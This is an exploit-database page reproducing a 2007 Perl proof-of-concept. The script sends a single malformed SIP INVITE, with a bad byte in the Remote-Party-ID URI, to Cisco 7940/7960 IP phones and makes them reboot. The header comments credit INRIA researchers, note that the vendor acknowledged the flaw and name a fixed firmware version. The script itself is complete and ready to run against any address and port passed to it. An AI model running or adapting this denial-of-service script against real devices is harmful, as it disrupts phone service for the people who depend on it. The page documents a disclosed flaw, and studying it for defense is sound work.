Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco Phone 7940/7960 (SIP INVITE) Remote Denial of Service Exploit

🗓️ 21 Mar 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 17 Views

Cisco Phone 7940/7960 SIP INVITE Remote Denial of Service Exploi

Code

                                                #!/usr/bin/perl
# Title: Cisco 7940 SIP INVITE remote DOS 
# Date: February 19, 2007 
# ID: KIPH2 
#
# Synopsis: After sending a cra fted INVITE message the device immediately 
# reboots. The phone does not check properly the sipURI field of the 
# Remote-Party-ID in the message. 
#
# The vendor was informed and acknowledged the vulnerability. This 
# vulnerability was identified by the Madynes research team at INRIA 
# Lorraine, using the Madynes VoIP fuzzer. 
#
# Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol 
# for VoIP signalization. SIP is an ASCII based INVITE message is used to 
# initiate and maintain a communication session. 
#
# Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00 
#
# Unaffected: devices running firmware POS8-6-0 
#
# Description: After receiving one crafted SIP INVITE message, the 
# affected device reboots immediately. The proof of concept code can be 
# used to demonstrate the vulnerability. 
#
# Resolution: 
#
# Fixed software is available from the vendor and customers following 
# recommended best practices (ie segregating VOIP traffic from data) will 
# be protected from malicious traffic in most situations. 
#
# Credits: 
#
# Humberto J. Abdelnur (Ph.D Student) 
#
# Radu State (Ph.D) 
#
# Olivier Festor (Ph.D) 
#
# This vulnerability was identified by the Madynes research team at INRIA 
#
# Lorraine, using the Madynes VoIP fuzzer. 
#
# http://madynes.loria.fr/ 

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);


$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);


$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: <sip:$ARGV[2]\@$ARGV[0];user=ip>\r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Mar 2007 00:00Current
7.1High risk
Vulners AI Score7.1
cisco phonesip inviteremote denial of serviceexploitvulnerabilityvoipfirmwarecrafted sip invitevulnerability identifiedmadynes research teaminria lorraine
17